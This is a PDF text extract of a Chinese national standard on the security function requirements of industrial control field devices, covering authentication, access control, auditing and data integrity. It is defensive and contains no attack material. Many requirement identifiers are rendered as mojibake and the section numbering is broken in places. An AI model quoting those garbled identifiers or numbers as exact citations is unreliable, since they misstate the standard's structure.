要求名:用于标识、分类、分族不同的要求。每个要求都有一个唯一的名称,表明该要求的目的。用 序号标识在族中的位置。 要求:描述要求的内容,表述设备为达到该项要求应满足的条件。 要求说明:描述要求的典型实现机制和技术原理。 要求加强:要求加强子项是对要求强度的加强或内容的增加,用序号标识在要求内的位置。 依赖要求:当要求项需要依赖于其他要求项,或与其他要求项共同使用才能发挥作用时,这种对其 他要求项的直接关联关系在本部分中注明。 6 通用安全功能要求 6.1 概述 工业控制系统现场测控设备的通用安全功能要求归纳见附录D。 6.2 FIA 类:用户标识与鉴别 6.2.1 类描述 用户标识和鉴别的目的是确定对设备的访问行为主体(人员、进程和设备)、以及对访问行为进行 控制。 根据设备数字与智能化程度的不同,设备具有多种外部访问接口,典型的接口包括: ——本地操作面板,用于查看或修改配置; ——本地 RS232 或 RS485 接口,用于业务数据传输或设备调试、管理; ——网络,用于设备调试、管理与业务数据传输。 通过这些接口对设备进行访问的典型的用户包括但不限于以下几种: ——设备使用、配置等操控人员; ——设备配置软件; ——系统上位机应用进程。 6.2.2 FIA_IAM 族:标识与鉴别方式 6.2.2.1 族描述 设备对用户身份进行标识和鉴别是对设备最基本的安全防护,也是实现权限分配和访问控制的 基础。 6.2.2.2 FIA_IAM.1 标识及方式 6.2.2.2.1 要求 工控系统现场测控设备应具备标识用户的能力。 6 . 2 . 2 . 2 . 2 要求说明 应对重要的用户提供身份标识,如配置管理用户、上位机控制进程等。 典型的用户身份标识符包括 网络地址(如物理地址、IP地址)、操控人员的用户标识符等。 6 . 2 . 2 . 2 . 3 要求加强 FIA_IAM. 1标识及方式的要求加强包括: a) 设备在所有对外接口上具有标识用户的能力; b) 设备在所有对外接口上都具备唯一标识用户的能力。 6 . 2 . 2 . 2 . 4 依赖要求 无 。 6 . 2 . 2 . 3 2鉴别及方式 6 . 2 . 2 . 3 . 1 要求 工控系统现场测控设备应具备在对外接口对用户身份进行鉴别的能力。 6 . 2 . 2 . 3 . 2 要求说明 设备应对开启的网络服务接口和重要的本地访问用户进行鉴别,如配置管理用户、远程访问服务 等。 典型的身份鉴别方式包括:口令、共享密钥、数字证书和生物特征等。 6 . 2 . 2 . 3 . 3 要求加强 FIA_IAM. 2鉴别及方式的要求加强包括: a) 设备在远程网络访问接口上对具有控制、参数和定值修改功能的用户实施双因素鉴别; b) 设备对所有远程网络访问接口上的用户实施双因素鉴别。 6 . 2 . 2 . 3 . 4 依赖要求 FIA_IAM. 2鉴别及方式的依赖要求是 FIA_IAM. 1 。 6 . 2 . 3 犉犐犃_犐犇犕族:标识符管理 6 . 2 . 3 . 1 族描述 工控系统现场测控设备能用于标识用户(人员、进程和设备)的标识包括网络层面的 IP地址、物理 地址、TCP/UDP端口、应用地址或操控人员标识符等。 其中人员用户标识符管理的功能相当于普通 IT应用系统的用户管理,针对直接使用控制面板对 设备进行查看或配置的操控人员,而IP地址、物理地址和端口的管理将在访问控制中阐述。 6 . 2 . 3 . 2 . 1操控人员标识符管理 6 . 2 . 3 . 2 . 1 要求 工控系统现场测控设备应具备向操控人员分配标识符的能力。 6 . 2 . 3 . 2 . 2 要求说明 设备应具备向具有运行参数或设备配置访问权限的操控人员分配标识符的能力。 6 . 2 . 3 . 2 . 3 要求加强 FIA_IDM. 1操控人员标识符管理的要求加强包括: a)设备支持对操控人员标识符进行添加、删除等管理; b)设备支持对安全策略规定一段时间不使用的操控人员标识符进行锁定。 6 . 2 . 3 . 2 . 4 依赖要求 FIA_IDM. 1操控人员标识符管理的依赖要求是 FIA_IAM. 1 。 6 . 2 . 4 :鉴别凭证管理 6 . 2 . 4 . 1 族描述 工控系统现场测控设备管理用户身份鉴别凭证的能力主要包括对鉴别凭证的强度和使用的管理。 由于对设备的访问方式可能包括本地面板访问、串口访问、网络访问、上位机应用访问,因此鉴别凭证的 使用和管理涵盖设备层和网络层的鉴别。 6 . 2 . 4 . 2 犉犐犃_犃犆犕. 1 口令修改 6 . 2 . 4 . 2 . 1 要求 工控系统现场测控设备应支持管理员等操控人员在不影响正常操作的情况下修改他们管理范围内 口令。 设备应支持并提示对出厂默认口令的修改。 6 . 2 . 4 . 2 . 2 要求说明 主要针对管理员、配置查看用户、配置修改用户等设备操控人员口令进行管理。 6 . 2 . 4 . 2 . 3 要求加强 无 。 6 . 2 . 4 . 2 . 4 依赖要求 FIA_ACM. 1口令修改的依赖要求是 FIA_IAM. 2 。 6 . 2 . 4 . 3 犉犐犃_犃犆犕. 2口令更换周期 6 . 2 . 4 . 3 . 1 要求 工控系统现场测控设备应支持安全策略中要求的口令使用周期。 6 . 2 . 4 . 3 . 2 要求说明 操控人员验证成功后,工控系统现场测控设备应提供必要的自动提醒能力,通知用户距离上次修改 密码时间已经超过了安全策略要求的密码使用周期。 6 . 2 . 4 . 3 . 3 要求加强 FIA_ACM. 2口令更换周期的要求加强为设备应支持管理员对口令更换周期进行配置。 6 . 2 . 4 . 3 . 4 依赖要求 FIA_ACM. 2口令更换周期的依赖要求是 FIA_IAM. 2 。 6 . 2 . 4 . 4 . 3口令强度控制 6 . 2 . 4 . 4 . 1 要求 工控系统现场测控设备应提供支持安全策略中口令强度要求的能力。 6 . 2 . 4 . 4 . 2 要求说明 在实现上,当用户设定口令强度不足时,工控系统现场测控设备应自动提醒用户口令强度应满足怎 样的安全策略。 6 . 2 . 4 . 4 . 3 要求加强 FIA_ACM. 3口令强度控制的要求加强为设备应支持管理员对口令的最小长度、使用周期和字母 或特殊字符数量进行配置。 6 . 2 . 4 . 4 . 4 依赖要求 FIA_ACM. 3口令强度控制的依赖要求是 FIA_IAM. 2 。 6 . 2 . 4 . 5 . 4口令失效 6 . 2 . 4 . 5 . 1 要求 设备的用户名/口令鉴别控制不应被绕过。 6 . 2 . 4 . 5 . 2 要求说明 典型的绕过机制包括但不限于以下机制和技术: — 嵌入式主口令 — 嵌入式芯片在硬件或软件故障时自动运行的默认的管理员权限 — 如跳线和开关设置等的密码模块或硬件旁路 厂商应说明设备上所有能绕过用户创建的用户名/口令鉴别的机制。 如果设备没有这样的机制,厂 商应予以声明。 6 . 2 . 4 . 5 . 3 要求加强 无 。 6 . 2 . 4 . 5 . 4 依赖要求 FIA_ACM. 4口令失效的依赖要求是 FIA_IAM. 2 。 6 . 2 . 4 . 6 犉犐犃_犃犆犕. 5证书及公私钥管理 6 . 2 . 4 . 6 . 1 要求 如果使用了公私钥或证书作为鉴别机制,工控系统现场测控设备(及其配置软件)应提供对公私钥 和证书进行管理的能力。 6 . 2 . 4 . 6 . 2 要求说明 用户使用配置软件对工业控制系统现场测控设备进行配置时,常使用证书进行身份鉴别,配置软件 犌犅/犜 36470— 2018 应能够对配置用户的公钥进行管理,并对证书进行识别。 在通信层面上,公私钥可用于现场测控设备和其他设备、远程配置系统、监控后台或上位机的通信 身份鉴别。 设备应保证本地存储私钥的安全,应能够对证书进行正确解析,对证书的真实性和有效性进 行验证。 6.2.4.6.3 要求加强 FIA_ACM. 5证书及公私钥管理的要求加强包括: a) 现场测控设备及其配置软件应支持按照安全策略要求定期更新公私钥; b) 在工控系统层面上建立有效的公私钥管理设施,如 CA。 6 . 2 . 4 . 6 . 4 依赖要求 FIA_ACM. 5证书及公私钥管理的依赖要求是 FIA_IAM. 2 。 6 . 2 . 4 . 7 犉犐犃_犃犆犕. 6对称密钥管理 6 . 2 . 4 . 7 . 1 要求 如果使用了对称密钥作为鉴别机制或进行传输数据加密,工控系统现场测控设备应提供对对称密 钥进行管理的能力。 6 . 2 . 4 . 7 . 2 要求说明 对称密钥可用于现场测控设备和其他设备、监控后台或上位机的通信身份鉴别。 设备应能保证本 地存储密钥的安全,同时满足密钥管理策略。 6 . 2 . 4 . 7 . 3 要求加强 FIA_ACM. 6对称密钥管理的要求加强包括: a) 现场测控设备应支持按照安全策略要求定期更新对称密钥; b) 现场测控设备应支持工控系统层面上的密钥管理体系,支持对密钥的分发、更新和撤销的 实现。 6 . 2 . 4 . 7 . 4 依赖要求 FIA_ACM. 6对称密钥管理的依赖要求是 FIA_IAM. 2 。 6 . 2 . 4 . 8 犉犐犃_犃犆犕. 7密码服务失效 6 . 2 . 4 . 8 . 1 要求 如果使用基于密码的鉴别机制,工控系统现场测控设备的重要用户的现场访问不得依赖于外部密 码服务。 6 . 2 . 4 . 8 . 2 要求说明 如果外部密码(如加密、密钥验证)服务不可用,可能导致测控设备拒绝服务。 本地重要用户访问关 键功能不应依靠外部验证服务。 对于远程访问关键功能的情况,可酌情考虑使用。 6 . 2 . 4 . 8 . 3 要求加强 无 。 6 . 2 . 4 . 8 . 4 依赖要求 FIA_ACM. 7密码服务失效的依赖要求是 FIA_IAM. 2、FIA_ACM. 5和 FIA_ACM. 6 。 6 . 2 . 5 犉犐犃_犔犌犕族:登录管理 6 . 2 . 5 . 1 族描述 工控系统现场测控设备登录管理主要包括对管理员、配置查看用户、配置修改用户等操控人员登录 行为的成功、失败和登录历史等进行管理。 6 . 2 . 5 . 2 犉犐犃_犔犌犕. 1登录失败管理 6 . 2 . 5 . 2 . 1 要求 工控系统现场测控设备应管理和记录操控人员自从最近的成功登录后的登录失败的次数和时间。 6 . 2 . 5 . 2 . 2 要求说明 主要对管理员等实现鉴别了的重要用户的登录失败行为进行管理。 登录方式涵盖本地面板登录、 通过私有配置软件登录、网络登录等方式。 6 . 2 . 5 . 2 . 3 要求加强 无 。 6 . 2 . 5 . 2 . 4 依赖要求 FIA_LGM. 1登录失败管理的依赖要求是 FIA_IAM. 2 。 6 . 2 . 5 . 3 2登录成功记录 6 . 2 . 5 . 3 . 1 要求 工控系统现场测控设备应管理和记录操控人员最后一 次登录成功的日期和时间。 6 . 2 . 5 . 3 . 2 要求说明 主要对管理员等实现鉴别了的重要用户的登录成功进行管理。 登录方式包括本地面板登录、通过 私有配置软件登录、网络登录等方式。 6 . 2 . 5 . 3 . 3 要求加强 无 。 6 . 2 . 5 . 3 . 4 依赖要求 FIA_LGM. 2登录成功记录的依赖要求是 FIA_IAM. 2 。 6 . 2 . 5 . 4 . 3登录历史 6 . 2 . 5 . 4 . 1 要求 用户验证成功后,工控系统现场测控设备应显示最近的登录成功的时间,及此后该账号登录失败的 次数和时间。 6 . 2 . 5 . 4 . 2 要求说明 主要对管理员等实现鉴别了的重要用户的登录进行管理。 登录方式涵盖本地面板登录、通过私有 配置软件登录、网络登录等方式。 6 . 2 . 5 . 4 . 3 要求加强 无 。 6 . 2 . 5 . 4 . 4 依赖要求 FIA_LGM. 3登录历史的依赖要求是 FIA_IAM. 2和 FIA__LGM. 1 。 6 . 2 . 5 . 5 犉犐犃_犔犌犕. 4多次登录失败 6 . 2 . 5 . 5 . 1 要求 当操控人员在一段时间内失败的登录尝试次数超过了安全策略中的规定值,现场测控设备应执行 限制机制。 6 . 2 . 5 . 5 . 2 要求说明 限制机制包括对操控人员进行锁定、发出警报等。 6 . 2 . 5 . 5 . 3 要求加强 FIA_LGM. 4多次登录失败的要求加强为设备应支持管理员对锁定前的登录失败次数和解锁方式 进行配置。 6 . 2 . 5 . 5 . 4 依赖要求 FIA_LGM. 4多次登录失败的依赖要求是 FIA_IAM. 2和 FIA__LGM. 1 。 6 . 2 . 5 . 6 犉犐犃_犔犌犕. 5鉴别反馈 6 . 2 . 5 . 6 . 1 要求 现场测控设备应在鉴别过程中对鉴别的返回信息模糊化,以免非授权人员利用这些信息。 6 . 2 . 5 . 6 . 2 要求说明 反馈信息中不应包含未授权人员可以利用的危害鉴别机制的信息。 6 . 2 . 5 . 6 . 3 要求加强 无 。 6 . 2 . 5 . 6 . 4 依赖要求 FIA_LGM. 5鉴别反馈的依赖要求是 FIA_IAM. 2 。 6 . 3 :使用控制 6 . 3 . 1 类描述 使用控制的目的是为了保护设备,在用户发起请求之前,确定每个请求访问设备的用户标识和权 限,根据权限执行所请求的操作,并进行控制和审计。 6 . 3 . 2 犉犝犆_犃犆犃族:访问控制授权 6 . 3 . 2 . 1 族描述 工控系统现场测控设备为不同访问用户分配权限,只允许通过身份鉴别的用户访问已授权的资源。 权限包括设备操控层面的运行数据查看、配置参数变更;系统应用层面的控制命令下发、定值下发、数据 量采集。 6 . 3 . 2 . 2 犉犝犆_犃犆犃. 1权限管理 6 . 3 . 2 . 2 . 1 要求 现场测控设备应支持对权限的管理。 6 . 3 . 2 . 2 . 2 要求说明 需要授权的典型功能包括: — 查看数据:查看数据是指查看设备的运行数据(电压、电流、功率、状态、报警等); — 查看配置设置:查看设备的配置(标值、通信地址、可编程的逻辑程序、固件版本号等); — 配置变更:下发和上传装置的配置文件,变更现有配置(如修改输入值、设定值、工艺参数值 等); — 固件变更:对不需要变更其硬件的设备进行新固件加载; — 账户管理:创建、删除或修改账户内容; — 审计日志:查看或下载审计日志; — 控制命令:上位机对设备下发控制命令。 授权项管理包括:对于设备使用、配置人员和配置软件,依据配置、查看、审计等角色分配权限,进行 权限管理;对于访问现场设备的其他设备或进程,对其发起采集或控制(功能)命令的权限进行管理。 6 . 3 . 2 . 2 . 3 要求加强 无 。 6 . 3 . 2 . 2 . 4 依赖要求 无 。 6 . 3 . 2 . 3 犉犝犆_犃犆犃. 2基于角色的访问控制 6 . 3 . 2 . 3 . 1 要求 现场测控设备的访问控制功能应提供支持基于角色的访问控制策略的能力。 6 . 3 . 2 . 3 . 2 要求说明 基于角色的访问控制,根据具体的用户访问权限级别来定义用户角色,用户在鉴别成功后被授予与 所分配角色对应的权限。 对于功能相对简单的设备,现场测控设备的用户角色和权限可在出厂时完成 配置,如配置用户、查看用户、审计用户、FTP应用访问、控制上位机等角色。 对于设备使用和配置用 户,用户设置可固定,如只有一个查看用户、一个配置用户、一个审计用户和一个管理员用户。 6 . 3 . 2 . 3 . 3 要求加强 无 。 6 . 3 . 2 . 3 . 4 依赖要求 FUC_ACA. 2基于角色的访问控制的依赖要求是 FIA_IAM. 1 。 6 . 3 . 2 . 4 犉犝犆_犃犆犃. 3管理员用户 6 . 3 . 2 . 4 . 1 要求 现场测控设备访问控制功能应支持管理员用户角色,管理员主要负责用户账户管理和安全功能 管理。 6 . 3 . 2 . 4 . 2 要求说明 仅允许管理员角色权限建立和管理其他账号。 对于功能简单的设备,管理员、配置用户和审计用户 可由一个用户承担,不设置复杂的用户管理模式。 系统运行中可采用“操作票”等管理手段实现用户和 操作人员的对应关系。 6 . 3 . 2 . 4 . 3 要求加强 无 。 6 . 3 . 2 . 4 . 4 依赖要求 FUC_ACA. 3管理员用户的依赖要求是 FIA_IAM. 1、FUC_ACA. 1和 FUC_ACA. 2 。 6 . 3 . 2 . 5 4最小权限原则 6 . 3 . 2 . 5 . 1 要求 用户仅具备完成任务所需的最小权限。 6 . 3 . 2 . 5 . 2 要求说明 新建的操控人员用户应由管理员来根据策略确定其权限。 现场设备的对端设备(上位机或其他现 场设备)对设备的访问也应基于最小权限,如只能访问某一 服务端口、只能进行某一类操作。 6 . 3 . 2 . 5 . 3 要求加强 无 。 6 . 3 . 2 . 5 . 4 依赖要求 FUC_ACA. 4最小权限原则的依赖要求是 FIA_IAM. 1和 FUC_ACA. 1 。 6 . 3 . 2 . 6 . 5权限分离 6 . 3 . 2 . 6 . 1 要求 现场测控设备应支持用户修改重要参数或进行重要控制操作的权限分离管理。 6 . 3 . 2 . 6 . 2 要求说明 分权管理的典型过程是操作用户和审核用户合作获得访问设备数据或执行控制操作的权限。 主要 是针对重要操作流程的安全机制,实现重要控制操作的执行和确认。 6 . 3 . 2 . 6 . 3 要求加强 无 。 6 . 3 . 2 . 6 . 4 依赖要求 FUC_ACA. 5权限分离的依赖要求是 FIA_IAM. 1、FUC_ACA. 1和 FUC_ACA. 2 。 6 . 3 . 3 :会话控制 6 . 3 . 3 . 1 族描述 工控系统现场测控设备对设备配置软件和操控人员用户会话进行控制,通过终止或锁定超时会话 保证会话的安全性。 6 . 3 . 3 . 2 犉犝犆_犛犈犆. 1本地会话超时 6 . 3 . 3 . 2 . 1 要求 当操控人员通过本机控制面板与设备的会话在策略规定的一段时间内不活动,设备应锁定会话。 6 . 3 . 3 . 2 . 2 要求说明 会话锁定应一直保持到用户重新登录。 6 . 3 . 3 . 2 . 3 要求加强 FUC_SEC. 1本地会话超时的要求加强为设备应支持管理员对会话锁定前的不活动时间进行配置。 6 . 3 . 3 . 2 . 4 依赖要求 无 。 6 . 3 . 3 . 3 2网络会话超时 6 . 3 . 3 . 3 . 1 要求 工控系统现场测控设备应在设备配置用户或配置软件与设备的会话在策略规定的一段时间内不活 动时,对会话进行终止。 6 . 3 . 3 . 3 . 2 要求说明 网络会话超时终止主要用于设备配置用户的网络访问,特别是远程访问,不对上位机进程进行限 制。 如果会话建立途经网络是具有完备物理访问控制机制的可信网络,也可依照本地会话超时进行 控制。 6 . 3 . 3 . 3 . 3 要求加强 FUC_SEC. 2网络会话超时的要求加强为设备应支持管理员对会话终止前的不活动时间进行配置。 6 . 3 . 3 . 3 . 4 依赖要求 无 。 6 . 3 . 4 审计踪迹产生 6 . 3 . 4 . 1 族描述 工控系统现场测控设备对安全性事件和重要生产活动的进行审计,对于修正错误、事故恢复、事件 调查等相关工作。 6 . 3 . 4 . 2 1审计事件 6 . 3 . 4 . 2 . 1 要求 工控系统现场测控设备应具备审计功能,对重要的安全性事件和重要生产活动进行审计。 6 . 3 . 4 . 2 . 2 要求说明 管理层面上,应根据设备和设备运行环境的风险评估结果决定需要审计的事件。 典型的重要设备操作事件包括: — 登录成功:操控人员成功本地/远程登录设备; — 非法登录尝试:操控人员连续多次输入口令错误; — 正常退出:操控人员发起的退出; — 超时退出:在预先定义好的一段时间内不活动,系统注销操控人员此次登陆; — 访问配置:将配置文件从设备下载存储到外部设备中(例如,计算机,记忆棒,光盘); — 配置更改:在设备中传入新配置或者通过面板输入新配置参数,使设备的配置发生改变; — 固件更换:在内存中增加新的设备运行固件; — 创建用户名/口令或更改:创建新的操控人员用户名/口令或者修改权限; — 删除用户名/口令:删除操控人员用户名/口令; — 访问审计踪迹:操控人员查看日志或将日志保存在外部设备或存储空间(计算机、内存条、光 盘); — 修改时间/日期:用户修改时间和日期。 典型的重要生产活动包括: — 参数修改:上位机或其他设备修改设备的开关量、档位等参数; — 设备重启:由于断电、按下重启按钮、修改上电顺序或配置修改导致的设备重启; — 非法连接尝试:不符合访问控制策略的连接尝试,如连接非法的 IP、MAC或不允许访问的 端口。 审计事件要与设备具备并开启的安全功能相对应,如不具备访问控制功能的设备不需要记录“非法 连接尝试”事件。 6 . 3 . 4 . 2 . 3 要求加强 FUC_ATC. 1审计事件的要求加强为设备应支持管理员对需要审计的事件清单进行配置。 6 . 3 . 4 . 2 . 4 依赖要求 FUC_ATC. 1审计事件的依赖要求是 FIA_LGM. 2、FIA_LGM. 4、FRF_NAC. 2和 FRA_BUC. 1 。 6 . 3 . 4 . 3 2审计踪迹的内容 6 . 3 . 4 . 3 . 1 要求 工控系统现场测控设备或承担审计功能的组件,其审计踪迹中应包含足够的可用于追踪与分析安 全事件的内容。 6 . 3 . 4 . 3 . 2 要求说明 根据审计踪迹,用户能够确定有哪些事件发生,事件发生时间,事件来源和事件结果。 大多数审计 踪迹内容包括: — 事件的日期和时间; — 事件的来源(例如,用户ID、应用地址、设备IP等); — 事件的操作; — 事件的结果(成功或失败)。 6 . 3 . 4 . 3 . 3 要求加强 FUC_ATC. 2审计踪迹的内容的要求加强为设备应支持管理员对审计踪迹的内容进行配置。 6 . 3 . 4 . 3 . 4 依赖要求 FUC_ATC. 2审计踪迹的内容的依赖要求是 FUC_ATC. 1 。 6 . 3 . 4 . 4 . 3审计的时间戳 6 . 3 . 4 . 4 . 1 要求 工控系统现场测控设备或承担审计功能的组件,其审计踪迹的时间应基于“系统时间”。 6 . 3 . 4 . 4 . 2 要求说明 系统时间是指工控系统内同步的时间,以便各种来源的事件都可以准确地和一个时间基准比对,准 确地判断事故。 6 . 3 . 4 . 4 . 3 要求加强 无 。 6 . 3 . 4 . 4 . 4 依赖要求 无 。 6 . 3 . 4 . 5 . 4用户关联 6 . 3 . 4 . 5 . 1 要求 工控系统现场测控设备或承担审计功能的组件,其记录的每个审计事件都应与引起该事件的用户 相关联。 6 . 3 . 4 . 5 . 2 要求说明 无 。 6 . 3 . 4 . 5 . 3 要求加强 无 。 6 . 3 . 4 . 5 . 4 依赖要求 FUC_ATC. 4用户关联的依赖要求是 FIA_IAM. 1 。 6 . 3 . 5 犉犝犆_犃犜犛族:审计踪迹存储 6 . 3 . 5 . 1 族描述 工控系统现场测控设备存储并保护安全性事件和重要生产活动的审计踪迹,分析时获得足够的、正 确的信息。 6 . 3 . 5 . 2 犉犝犆_犃犜犛. 1审计存储容量 6 . 3 . 5 . 2 . 1 要求 工控系统现场测控设备应具备一定的审计踪迹存储容量。 6 . 3 . 5 . 2 . 2 要求说明 如果由工控系统现场测控设备自身完成审计功能,那么设备能维护一个大小合理的存储空间,在满 足审计功能的同时,保证不影响设备的可用性。 6 . 3 . 5 . 2 . 3 要求加强 无 。 6 . 3 . 5 . 2 . 4 依赖要求 无 。 6 . 3 . 5 . 3 犉犝犆_犃犜犛. 2审计功能异常 6 . 3 . 5 . 3 . 1 要求 工控系统现场测控设备或从事审计功能的组件应在审计失败时发出适当的告警。 6 . 3 . 5 . 3 . 2 要求说明 告警的方式如警示灯、鸣笛等。 审计处理失败包括软件或硬件错误、生成审计踪迹过程中的错误、 审计踪迹存储空间满载等。 6 . 3 . 5 . 3 . 3 要求加强 FUC_ATS. 2审计功能异常的要求加强为设备应支持管理员配置设备在审计踪迹存储空间满载时 可自动执行的操作,如覆盖旧的审计踪迹或停止生成审计踪迹等。 6 . 3 . 5 . 3 . 4 依赖要求 FUC_ATS. 2审计功能异常的依赖要求是 FUC_ATS. 1 。 6 . 3 . 5 . 4 . 3审计踪迹保护 6 . 3 . 5 . 4 . 1 要求 工控系统现场测控设备或从事审计功能的组件应保护审计踪迹和审计工具不被非授权访问、修改 或删除。 6 . 3 . 5 . 4 . 2 要求说明 应保证只有授权用户可对审计踪迹进行操作。 可通过增加校验码实现审计踪迹的防篡改。 6 . 3 . 5 . 4 . 3 要求加强 FUC_ATS. 3审计踪迹保护的要求加强为设备应为审计踪迹提供基于密码的保护功能。 6 . 3 . 5 . 4 . 4 依赖要求 FUC_ATS. 3审计踪迹保护的依赖要求是 FUC_ACA. 1 。 6 . 3 . 6 :审计踪迹访问 6 . 3 . 6 . 1 族描述 工控系统现场测控设备支持用户对审计踪迹进行访问,便于查看、分析和集中处理。 6 . 3 . 6 . 2 . 1审计踪迹读取 6 . 3 . 6 . 2 . 1 要求 工控系统现场测控设备或从事审计功能的组件应保证以便于用户理解的方式提供审计踪迹,且只 有授权用户可读取审计踪迹。 6 . 3 . 6 . 2 . 2 要求说明 只有授权用户具备获得和解释审计踪迹的能力。 用户是操控人员时,信息应以可理解的方式表示; 用户为外部IT实体时,信息应以电子方式无歧义的表示。 6 . 3 . 6 . 2 . 3 要求加强 无 。 6 . 3 . 6 . 2 . 4 依赖要求 FUC_ATR. 1审计踪迹读取的依赖要求是 FUC_ACA. 1和 FUC_ATS. 3 。 6 . 3 . 6 . 3 . 2审计踪迹报送 6 . 3 . 6 . 3 . 1 要求 工控系统现场测控设备或承担审计功能的组件应能够将自身审计踪迹发送给其他设备进行更高级 别的审计。 6 . 3 . 6 . 3 . 2 要求说明 由于嵌入式设备的审计踪迹存储容量是有限的,宜从系统层面使用工具对系统范围内所有设备和 主机的审计踪迹进行过滤和分析,设备的审计踪迹格式应是统一 的 。 6 . 3 . 6 . 3 . 3 要求加强 无 。 6 . 3 . 6 . 3 . 4 依赖要求 无 。 6 . 3 . 6 . 4 犉犝犆_犃犜犚. 3审计报告 6 . 3 . 6 . 4 . 1 要求 工控系统现场测控设备或承担审计功能的组件应具备审计归纳和报告功能,以实现对审计踪迹的 归纳、审查。 报告工具支持在不改变原始审计踪迹的情况下作安全事件的事后调查。 6 . 3 . 6 . 4 . 2 要求说明 一般情况下,审计踪迹的归纳和报告的生成会在一个独立的信息系统中执行,比如在系统范围审计 工具中实现。 6 . 3 . 6 . 4 . 3 要求加强 无 。 6 . 3 . 6 . 4 . 4 依赖要求 FUC_ATR. 3审计报告的依赖要求是 FUC_ATR. 2 。 6 . 4 犉犇犐类:数据完整性 6 . 4 . 1 类描述 对数据的完整性进行保护的目的是防止数据被篡改,主要防护对象是危险的开放环境中传输的数 据或存储的数据。 6 . 4 . 2 犉犇犐_犇犛犐族:数据存储完整性 6 . 4 . 2 . 1 族描述 在工控系统现场测控设备上对存储数据的完整性进行保护,防止软件和信息被未授权篡改。 6 . 4 . 2 . 2 犉犇犐_犇犛犐. 1安全功能检测 6 . 4 . 2 . 2 . 1 要求 工控系统现场测控设备应具备机制验证安全保护功能的执行情况,在发生异常情况时发出报告。 6 . 4 . 2 . 2 . 2 要求说明 对于不具备安全功能自检的设备,应具备其他补偿机制或者判定风险是可接收的。 设备厂商或集 成商应提供如何测试所设计的安全措施的指南。 6 . 4 . 2 . 2 . 3 要求加强 FDI_DSI. 1安全功能检测的要求加强为设备应提供接口并支持工控系统层面的整体安全功能自动 验证与报警。 6 . 4 . 2 . 2 . 4 依赖要求 FDI_DSI. 1安全功能检测的依赖要求是 FUC_ATC. 1 。 6 . 4 . 2 . 3 .2异常处理 6 . 4 . 2 . 3 . 1 要求 工控系统现场测控设备应识别和处理异常情况并迅速产生安全相关错误消息。 6 . 4 . 2 . 3 . 2 要求说明 错误消息中应仅包含用于定位处理某 一 特定问题的信息,应不包含可用于发起信息安全攻击的 信息。 6 . 4 . 2 . 3 . 3 要求加强 无 。 6 . 4 . 2 . 3 . 4 依赖要求 无 。 6 . 4 . 2 . 4 .3输入验证 6 . 4 . 2 . 4 . 1 要求 工控系统现场测控设备应检查输入信息的一致性、完整性、有效性和真实性。 6 . 4 . 2 . 4 . 2 要求说明 外部源输入的数据主要包括两类: — 应用输入:用于作为过程控制的输入(如:操作员的输入、I/O输入和其他现场设备传输的数 据); — 程序配置:用于对设备进行状态变更。 通过本地控制面板或配置软件输入的参数应可见。 6 . 4 . 2 . 4 . 3 要求加强 无 。 6 . 4 . 2 . 4 . 4 依赖要求 无 。 6 . 4 . 2 . 5 .4静态数据防篡改 6 . 4 . 2 . 5 . 1 要求 工控系统现场测控设备应具备防止对静态数据进行非授权写操作的保护机制(硬件和/或软件)。 6 . 4 . 2 . 5 . 2 要求说明 工控系统现场测控设备应具备基本的对用户应用配置数据、可执行代码的未授权修改、删除或插入 犌犅/犜 36470— 2018 的防护机制。 具有操作系统的工控系统现场测控设备应具备防止未授权修改产品操作系统和修改、删 除或插入运行数据的机制。 工控系统现场测控设备应能够自动检测对内存中的应用配置数据的修改,自动检测对内存中可执 行代码的修改与插入,防止非授权的修改或插入。 设备应针对当可执行代码的修改和加载不是厂商授 权版本更新的情况进行防护。 工控系统现场测控设备应能够自动检测对内存中操作系统配置的修改。 设备应针对当操作系统配 置的修改不是厂商的授权版本更新的情况进行防护。 典型操作包括非法修改处理系统异常的中断向量 表和进程调度算法。 6 . 4 . 2 . 5 . 3 要求加强 FDI_DSI. 4静态数据防篡改的要求加强为设备应具备基于密码的静态数据未授权修改的防护 机制。 6 . 4 . 2 . 5 . 4 依赖要求 无 。 6 . 4 . 3 :数据传输完整性 6 . 4 . 3 . 1 族描述 工控系统现场测控设备对传输数据的完整性,主要针对系统应用通信数据的安全,例如设备与上位 机之间、设备与设备之间的通信。 6 . 4 . 3 . 2 犉犇犐_犇犜犐. 1数据包插入 6 . 4 . 3 . 2 . 1 要求 工控系统现场测控设备应具备抵御在通信数据中插入恶意或无关数据包的机制。 6 . 4 . 3 . 2 . 2 要求说明 主要通过添加序列码,设备对序列码的有效性进行判断,从而识别是否为无用或恶意的数据包。 6 . 4 . 3 . 2 . 3 要求加强 无 。 6 . 4 . 3 . 2 . 4 依赖要求 无 。 6 . 4 . 3 . 3 犉犇犐_犇犜犐.2数据包丢失 6 . 4 . 3 . 3 . 1 要求 工控系统现场测控设备应具备抵御恶意删除数据包的机制。 6 . 4 . 3 . 3 . 2 要求说明 主要通过添加序列码,设备判断序列码的连续性,从而识别是否存在数据包丢失的情况。 犌犅/犜 36470— 2018 6 . 4 . 3 . 3 . 3 要求加强 无 。 6 . 4 . 3 . 3 . 4 依赖要求 无 。 6 . 4 . 3 . 4 犉犇犐_犇犜犐.3数据包延迟 6 . 4 . 3 . 4 . 1 要求 工控系统现场测控设备应能够处理过度延迟的数据包。 6 . 4 . 3 . 4 . 2 要求说明 可以通过在系统应用层面上收方发送收包确认信息、使用时间窗或设定超时容忍时间来处理过度 延迟的数据包。 6 . 4 . 3 . 4 . 3 要求加强 无 。 6 . 4 . 3 . 4 . 4 依赖要求 无 。 6 . 4 . 3 . 5 犉犇犐_犇犜犐.4数据包重放 6 . 4 . 3 . 5 . 1 要求 工控系统现场测控设备应具备机制抵御数据包的重放。 6 . 4 . 3 . 5 . 2 要求说明 主要通过添加序列码或时间标签,设备判断序列码或时间标签是否新鲜,从而识别是否存在数据包 的重放。 6 . 4 . 3 . 5 . 3 要求加强 无 。 6 . 4 . 3 . 5 . 4 依赖要求 无 。 6 . 4 . 3 . 6 犉犇犐_犇犜犐.5数据包防篡改 6 . 4 . 3 . 6 . 1 要求 工控系统现场测控设备应具备识别篡改通信信息的机制。 6 . 4 . 3 . 6 . 2 要求说明 检测通信过程中出现的错误的典型机制为 CRC, 一 般用于对抗随机错误,比如 TCP的循环校 犌犅/犜 36470— 2018 验码。 6 . 4 . 3 . 6 . 3 要求加强 FDI_DTI. 5数据包防篡改的要求加强为设备应具备基于密码的通信信息防篡改机制。 典型机制 如 MAC、散列函数(HASH)等。 6 . 4 . 3 . 6 . 4 依赖要求 无 。 6 . 4 . 3 . 7 犉犇犐_犇犜犐.6会话保护 6 . 4 . 3 . 7 . 1 